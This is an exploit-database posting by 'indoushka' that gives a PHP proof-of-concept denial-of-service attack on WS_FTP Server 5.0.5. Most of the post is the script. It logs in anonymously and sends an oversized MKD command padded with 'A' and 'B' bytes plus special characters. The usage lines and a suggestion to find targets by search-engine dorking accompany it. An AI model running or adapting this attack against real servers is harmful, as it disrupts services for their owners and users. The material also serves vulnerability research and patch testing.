Share
## https://sploitus.com/exploit?id=PACKETSTORM:189693
=============================================================================================================================================
| # Title : WS FTP Server 5.0.5 - Denied of Service vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://ws-ftp-le.software.informer.com/5.0/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: This code is for WS_FTP Server 5.0.5 and represents a Denial of Service (DoS) attack.
(Related : https://packetstorm.news/files/id/176847/ Linked CVE numbers: ) .
[+] save code as poc.php.
[+] Usage = C:\www>php 2.php 127.0.0.1 21
[+] PayLoad :
<?php
// Exploit Title: WS_FTP Server 5.0.5 - Denied of Service (DoS)
function intro() {
echo "\n-------------------------------------------------------------------------\n";
echo "--------------- [+] WS_FTP Server 5.0.5 - Denied of Service (DoS) ----\n";
echo "----------------------------indoushka------------------------------------\n";
}
function main() {
global $argv;
if (count($argv) < 3) {
echo "Usage: php script.php <ip> <port>\n";
exit(-1);
}
$ip = $argv[1];
$port = $argv[2];
$exploit = str_repeat("\x41", 676); // Fill with A's
$exploit .= "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"; // Exploit payload
$exploit .= str_repeat("\x42", 3000); // Additional padding
$exploit .= "\r\n";
// إنشاء الاتصال بالخادم
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
echo "[-] Not connected to $ip:$port: $errstr\n";
exit(0);
}
// قراءة استجابة الخادم
$response = fread($sock, 1024);
echo "Connected => $response\n";
// إرسال بيانات التوثيق
fwrite($sock, "USER anonymous\r\n");
$response = fread($sock, 1024);
echo "Authentication USER: $response\n";
fwrite($sock, "PASS anonymous\r\n");
$response = fread($sock, 1024);
echo "Authentication PASSWORD: $response\n";
// إرسال الحمولة لاستغلال الثغرة
fwrite($sock, "MKD " . $exploit);
$response = fread($sock, 1024);
echo "Exploited: $response\n";
fclose($sock);
}
// بداية التنفيذ
intro();
main();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================